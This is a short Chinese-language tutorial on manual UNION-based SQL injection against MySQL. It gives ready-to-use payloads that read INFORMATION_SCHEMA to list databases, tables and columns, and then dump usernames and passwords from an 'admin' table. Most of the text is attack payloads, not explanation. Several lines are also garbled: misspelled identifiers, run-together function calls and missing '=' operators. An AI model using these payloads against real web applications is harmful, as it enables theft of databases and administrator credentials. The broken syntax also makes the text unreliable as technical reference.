申明:固然网上对于mysql手工盲注的材料良多 然而大多都是大篇幅 语句极其庞杂
学习盲注前先懂得下 IFORMATION_SCHEMA 库
Mysql5内置的系统数据库IFORMATION_SCHEMA,其构造如MSSQL中的master数据库,其中记载了Mysql中所有
存在数据库名、数据库表、表字段。重点请求研讨多少个对SQL注入有用的数据表阐明。
1.得到所有数据库名:
'SCHEMATA 存储数据库名的表
'字段:SCHEMA_NAME 数据库名称
'TABLES 存储表名
'字段:TABLE_SCHEMA 表现该表名属于哪个数据库名
'字段:TABLE_NAME 存储表的表名
'COLUMNS 存储的字段名表
'字段:TABLE_SCHEMA 该字段所属数据库名
'字段:TABLE_NAME 存储所属表的名称
'字段:COLUMN_NAME 该字段的名称
###########################################################################
0x001 获取系统信息:
union select 1,2,3,4,5,concat(global.version_pile_os,0x3c62723e,datadir,0x3c62723e,user(),0x3c62723e,version()da tabase(),0x3c62723e,database()),7,8,9 /.
/.
global.version_pile_os 获取体系版本
datadir 数据库门路
database() 当前数据库名称
0x3c62723e 换行HEX值
./
######################################################################
0x002 获取表名
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema0x67617264656e /.
/.
0x67617264656e 为当前数据库名
group_concat(table_name) 应用group_concat函数 一步获得该库所有表名
./
######################################################################
0x003 获取字段
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name0x61646d696e and table_schema0x67617264656e limit 1 /.
/.
group_concat(column_name) 同样是 一口吻 取得该表0x61646d696e所有字段
0x61646d696e 抉择一个表
0x67617264656e 数据库名
./
#####################################################################
0x004 获取数据
union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
/.
0x3c62723e 换行符,HEX编码
group_concat 同时失掉该字段所有数据
./
BY:nginxshell